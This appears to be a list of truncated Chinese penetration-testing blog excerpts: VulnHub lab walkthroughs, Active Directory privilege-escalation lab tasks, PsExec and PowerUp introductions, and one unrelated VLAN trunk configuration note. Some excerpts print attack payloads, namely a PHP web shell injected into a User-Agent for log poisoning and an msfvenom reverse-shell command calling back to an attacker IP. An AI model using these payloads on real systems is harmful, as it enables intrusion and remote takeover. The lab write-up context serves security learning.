实验环境攻击者 Kali 192.168.192.128受害者 DC-6 IP未知攻击者和受害者在同一网段  1. 信息收集nmap -sn 192.168.192.0/24受害者IP为192.168.192.171 收集受害者服务详情nmap -sV -A 192.16...

1. 概述配置Trunk时，应先使用port link-type trunk命令修改端口的类型为Trunk，然后再配置Trunk端口允许哪些VLAN的数据帧通过。执行port trunk allow-pass vlan { { vlan-id1 [ to vlan-i...

目标IP 192.168.174.16当前有LFI漏洞 /meteor/index.php?page=且可以访问/var/log/access.log现在我们在User-Agent里插入php木马并运行<?php echo system($_GET['cmd']); ?>通过ps命令验...

实验环境攻击者 Kali 192.168.192.128受害者 IP 192.168.192.187 Linux 1. 信息收集如果不把域名放入/etc/hosts的话 那么就掉到兔子洞里了所以把这个写入/etc/hosts中访问weakness.jth/| __ / ...

PsExec 是一个非常通用的工具，是 Mark Russinovich 开发的 SysInternals套件的一部分。它旨在取代类似 telnet 的应用程序，并通过交互式控制台在其他系统上提供进程的远程执行。为了滥用该工具...

任务• 使用 DA 访问 dollarcorp.moneycorp.local，使用 dollarcorp 的 krbtgt 哈希将权限提升至企业管理员或 DA 至父域 moneycorp.local。 >C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rub...

拿到了反弹shell之后这种可以用Juciy Potato或者PrintSpoofer提权kali上制作木马msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.16.18 LPORT=3333 > systemreverse.batKali监听333...

实验环境攻击者 Kali 192.168.192.128受害者 pwnlab_init IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.192.0/24受害者IP为 192.168.192.160 收集受害者服务详情nmap -sV -A ...

任务枚举moneycorp.local森林的所有域绘制dollarcorp.moneycorp.local 域的信任绘制moneycorp.local森林的外部信任识别dollarcorp 域的外部信任 枚举信任森林的信任 1. Powerview方法运行 invi...

1. 介绍PowerUp是一个Powershell程序，使用户能够枚举并潜在地利用针对Windows机器的特权升级机会PowerUp.ps1脚本是属于PowerSploit工具包的一个工具能够扫描并识别windows系统中的错误配置 2....